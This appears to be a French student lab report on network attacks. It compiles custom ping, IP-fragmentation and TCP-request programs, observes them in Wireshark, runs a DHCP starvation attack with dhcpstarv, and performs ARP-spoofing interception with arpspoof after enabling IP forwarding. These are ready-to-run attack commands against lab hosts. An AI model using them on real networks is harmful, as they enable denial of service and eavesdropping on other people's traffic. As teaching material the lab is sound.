générer un paquet IP echo
#cc -c my_ping.c pour compiler
#cc my_ping.c –o myping pour générer l’exécutable
#./myping 192.168.1.1 192.168.1.2 500
on utilise WireShark pour observer le résultat
faire un ping avec une taille de 2000 octets sur le lien ethernet
#cc -c pingfragments.c pour compiler
#cc pingfragments.c –o pf pour générer l’exécutable
#./pf 192.168.1.1 192.168.1.2 2000
on utilise WireShark pour observer les différents champs des fragments IP
compiler et générer l’exécutable
#cc -c pingsur2frag.c pour compiler
#cc pingsur2frag.c –o psf pour générer l’exécutable
#./psf 192.168.1.1 192.168.1.2 2000
observer le resultat
compiler et générer l’exécutable
#cc -c demandeconntcp.c pour compiler
#cc demandeconntcp.c –o dct pour générer l’exécutable
#./dct 192.168.1.1 192.168.1.2 2000
resultat :
L’attaquant inonde le serveur DHCP avec des messages DHCPREQUEST afin de réserver toutes les adresses IP disponibles sur le serveur DHCP. L’attaquant doit utiliser une nouvelle adresse MAC pour chaque requête
#tar –xvf dhcpstarv-0.2.1.tar.gz
#cd dhcpstarv-0.2.1
#./configure
#make
#make install
Sur une autre machine, on a configurer le serveur DHCP _ configuration du dhcp _
#sudo dhcpstarv -i eth0
on observe sur WireShark l'envoie des demandes dhcp (dhcp discover)
l'assignment des adresses ip
Pour réaliser cette attaque, nous avons besoin de trois nœuds connectés à un switch (cas réel ou sur GNS3) ou à un point d'accès sans fil. Le nœud attaquant sera la machine sur laquelle est installé le système d'exploitation « Kali Linux »
Tester si le routage est activé en utilisant la commande sysctl ou en cherchant la valeur de ip_forward dans /proc/sys/ipv4
Root# sysctl net.ipv4.ip_forward
net.ipv4.ip_forward = 0
Activer le routage :
root# sysctl -w net.ipv4.ip_forward=1
Lancer une communication entre les deux nœuds légtimes (exemple : ping) puis afficher le contenu de leur table arp (arp -a). Exécuter, ensuite, l'attaque arpspoof.
root#arpspoof -i eth0 -t 192.168.1.3 192.168.1.4
root#arpspoof -i eth0 -t 192.168.1.4 192.168.1.3
on utilise Wireshark pour afficher le trafic capturé par l'attaquant
root#wireshark
les tables arp apres l'attaque
Dans cette partie, nous utiliserons l'outil « cat Karat packet Builder » : Tout d'abord, on choisit l'interface qu'on veut attaquer, puis on choisit le protocole et la taille des paquets :
Maintenant, nous envoyons une requête Arp : Nous devons déterminer l'adresse IP et l'adresse Mac de la source et de la destination Nous suivons le trafic en utilisant le wireshark : manip 2: Nous devons déterminer l'adresse IP et l'adresse Mac de la source et de la destination